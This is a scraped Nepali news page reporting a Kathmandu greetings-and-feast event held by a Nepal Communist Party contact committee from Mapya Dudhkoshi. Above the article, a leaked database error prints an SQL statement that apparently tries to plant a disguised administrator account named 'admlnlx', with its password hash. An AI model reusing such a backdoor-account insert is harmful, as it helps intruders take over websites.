WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B./Y5u5FaZpBErDFI6orx8lLEJFU35.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-30 06:29:17', '', 'admlnlx', 'admlnlx')

माप्यदुधकोशी-काठमाडौ सम्पर्क कमिटीको शुभकामना आदानप्रदान कार्यक्रम सम्पन्न – Gaule Khabar

माप्यदुधकोशी-काठमाडौ सम्पर्क कमिटीको शुभकामना आदानप्रदान कार्यक्रम सम्पन्न

माप्यदुधकोशी-काठमाडौ सम्पर्क कमिटीको शुभकामना आदानप्रदान कार्यक्रम सम्पन्न

गाउँले न्युज, काठमाडौ । नेपाल कम्युनिस्ट पार्टी (नेकपा) माप्यदुधकोशी-काठमाडौ सम्पर्क आयोजक कमिटीले नव बर्ष २०७७ को पुर्ब सन्ध्यामा शुभकामना आदानप्रदान तथा सहभोज कार्यक्रम सम्पन्न गरेको छ ।

फाल्गुन १० गते शनिवार काठमाण्डौको सुकेधारा स्थिथ नवदुर्गा पार्टी प्यालेससमा नेकपाका केन्द्रिय सदस्य एबं सोलुखुम्बुका संघीय संसद हेम कुमार राई “सुरबीर” को प्रमुख अतित्थिमा सम्पन्न भएको हो ।

सहभोज तथा शुभकामना आदान प्रदान कार्यक्रममा नेकपा केन्द्रिय सदस्य शिव बहादुर बस्नेत “राजेन्द्र”, पूर्व संसद आङदावा शेर्पा, प्रदेस न १ सोलुखुम्बु “क” का संसद उत्तम बस्नेत, थुलुङ दुधकोशी गाउँपालिका अध्यक्ष असिम राई, नेकपा जिल्ला सचिब कज्याङ शेर्पा “गोम्बु”, माप्यदुधकोशी गाउँपालिका नेकपा अध्यक्ष गौरब राई, माप्य दुधकोशी गाउँपालिका उपाध्यक्ष जुनिता मगर, माप्य दुधकोशी गाउँपालिका बाट काठमाण्डौ आई विभिन्न पेसा र ब्यवसाय गर्ने नेकपाका नेताकार्यकर्ताहरुको बाक्लो सहभागिता रहेको थियो ।

माप्य दुधकोशी-काठमाण्डौ सम्पर्क आयोजक कमिटीका अध्यक्ष चन्द्र घिमिरेको अध्यक्षतामा सन्चालित कार्यक्रममा विभिन्न मनोरन्जनात्मक खेलकुदको पनि आयोजना गरिएको थियो ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका